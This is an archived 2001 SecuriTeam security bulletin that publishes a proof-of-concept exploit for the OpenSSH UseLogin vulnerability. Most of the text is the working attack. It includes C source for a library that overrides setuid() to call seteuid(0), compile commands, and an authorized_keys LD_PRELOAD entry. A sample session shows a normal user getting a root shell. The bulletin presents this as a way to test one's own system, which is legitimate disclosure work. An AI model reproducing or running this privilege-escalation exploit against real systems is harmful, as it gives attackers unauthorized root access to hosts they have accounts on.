[EXPL] OpenSSH UseLogin Bug Proof of Concept Exploit
From: support@securiteam.comDate: 12/18/01
- Previous message: support@securiteam.com: "[TOOL] SMBProxy"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 18 Dec 2001 08:14:44 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
OpenSSH UseLogin Bug Proof of Concept Exploit
------------------------------------------------------------------------
SUMMARY
In our previous article:
<http://www.securiteam.com/unixfocus/6K00J0U3FI.html> OpenSSH UseLogin
Directive Vulnerability Leads to Remote Root Compromise, we discussed a
security vulnerability in OpenSSH that would allow a local attacker to
gain elevated privileges. The following is an exploit code that would
allow you to test your system for the mentioned vulnerability.
DETAILS
Exploit:
Create a lib.c file with the next content:
---8<---
#include <stdio.h>
int setuid(int uid){
printf("setuid() called...\n");
seteuid(0);
}
---8<---
Compile it into a library:
$ gcc -c -o lib.o lib.c
$ ld -shared -o libroot.so lib.o
$ chmod 755 ./libroot.so
Now, for the tricky part:
You must have an account on the machine, and create an entry on
$HOME/.ssh/authorized_keys (or authorized_keys2) with:
environment="LD_PRELOAD=<your home>/libroot.so" <your public key>
When SSH receives your connection, it will export this variable into the
environment before running login. Somewhere after this, it executes a
setuid. When it does, it makes a seteuid(0).
$ id
uid=1000(war) gid=100(users) groups=100(users)
$ ssh war@localhost
Enter passphrase for key '/home/war/.ssh/id_dsa':
sh-2.04# id
uid=0(root) gid=100(users) groups=100(users)
This also works remotely. Anyway, you must have an account on the victim
machine so you can setup the enviroment, and login. Obviously, it must
have UseLogin enabled.
ADDITIONAL INFORMATION
The information has been provided by <mailto:war@genhex.org> [WaR].
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[TOOL] SMBProxy"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
